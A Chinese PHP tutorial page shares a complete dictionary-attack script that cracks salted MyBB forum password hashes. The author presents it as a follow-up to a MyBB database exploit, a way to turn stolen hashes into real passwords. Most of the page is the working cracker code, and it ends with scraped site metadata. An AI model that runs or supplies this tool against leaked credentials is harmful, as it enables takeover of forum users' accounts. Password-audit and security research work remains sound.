MyBB論壇程式密碼暴力破解工具PHP版_PHP教程

前兩天和消失看的那個myBB論壇的exploit之後，破解出來的密碼很變態~是經過md5(md5(salt).md(pass))這種形式的~
一直沒有進展~今天編寫了一個小的利用程式~希望大家能用得上~
pass.txt為密碼字典~~一行一個~

另外，雖然程式中用了很垃圾的英文字元，但是程式絕對原創~

[Copy to clipboard] [ - ]CODE:
/*
MyBB論壇程式密碼暴力破解工具PHP版 By Cool_wXd[C.R.S.T]
本程式主要是針對MyBB論壇程式密碼加密形式md5(md5(salt).md5(password))
由於網路上針對MyBB的exploit程式只是破解出來資料庫中的密碼，而沒有破解出來真正的密碼
也是由於最近遇到這樣的問題，所以寫出這麼一個簡單的小程式希望能夠有所協助！
*/
if ($argc<3)
{
print "--------------------------------------------------------------";
print " MyBB Password Cracker v1.0";
print "--------------------------------------------------------------";
print "Usage: mybb_password_cracker.php [md5_hash] [salt]";
print "--------------------------------------------------------------";
print "http://www.wolfexp.net & http://hi.baidu.com/cool_wxd";
print " By Cool_wXd[C.R.S.T]";
print "--------------------------------------------------------------";
die;
}
function salt_password($password, $salt)
{
return md5(md5($salt).md5($password));
}
$md5_hash = $argv[1];
$salt = $argv[2];
$dict="pass.txt";//password dictionary
if (strlen($md5_hash)!=32) {echo Error... The md5_hash must be 32 bits; die;}
if(!file_exists($dict)) {echo Can not find the password dictionary;die;}
$dict_pass=file($dict);
$num=sizeof($dict_pass);
for($i=0;$i<$num;$i++)
{
$now_password=chop($dict_pass[$i]);
if($md5_hash==salt_password($now_password,$salt)) {echo Success!(.$md5_hash.)is cracked and the true password is：(.$now_password.);break;}}
?>
另外，我們測試的那個論壇中我們註冊帳號的密碼破解

http://www.bkjia.com/PHPjc/508529.htmlwww.bkjia.comtruehttp://www.bkjia.com/PHPjc/508529.htmlTechArticle前兩天和消失看的那個myBB論壇的exploit之後，破解出來的密碼很變態~是經過md5(md5(salt).md(pass))這種形式的~ 一直沒有進展~今天編寫了一個小...

